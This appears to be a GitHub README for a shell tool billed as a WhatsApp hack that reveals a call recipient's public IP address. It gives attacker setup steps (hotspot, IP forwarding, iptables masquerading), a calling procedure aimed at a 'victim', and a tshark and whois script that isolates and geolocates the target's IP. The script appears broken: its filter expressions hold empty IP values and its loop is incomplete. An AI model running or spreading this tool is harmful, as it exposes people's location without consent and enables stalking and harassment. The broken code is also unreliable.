
Leak Public IP from victim caller.

Primary LanguageShell

🔥 New WhatsApp Hack! (Leak Public IP Addresses) 🔥

Leak Public IP from victim caller.

This program is for Educational purpose ONLY. Do not use it without permission. I am not responsible for any of your actions. Use this tool with caution.

Attack the victim

Install hotspotd with these steps:

wget https://github.com/prahladyeri/hotspotd/raw/master/dist/hotspotd-latest.tar.gz
tar xvf hotspotd-latest.tar.gz
cd hotspotd-0.1.6/
sudo python setup.py install
  • Step 1: Start WiFi hotspot on attacker machine and connect attacker phone to attacker SSID
sudo hotspotd start
  • Step 2: Run the following commands:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -I POSTROUTING -j MASQUERADE
  • Step 3: Start the PoC script (below) on attacker machine which is now acting as a router for attacker phone
  • Step 4: Call any whatsapp user randomly to capture the server IP addresses to filter
  • Step 5: Call victim on his whatsapp
  • Step 6: Disconnect the call once established
  • Step 7: Script will reveal the public IP address of the target
  • Step 8: Validate the public IP address on target phone



filter=`tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!= and ip.dst!= and ip.dst!=" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"`

echo "Press Enter and call your target."

read line

tshark -i eth0 -l -T fields -f "udp" -e ip.dst -Y "$filter" -Y "ip.dst!= and ip.dst!= and ip.dst!=" | while read line 
	whois $line > /tmp/b

	filter=`cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l`

	if [ "$filter" -gt 0 ] ; then 
		targetinfo=`cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"` 
		echo $line --- $targetinfo 
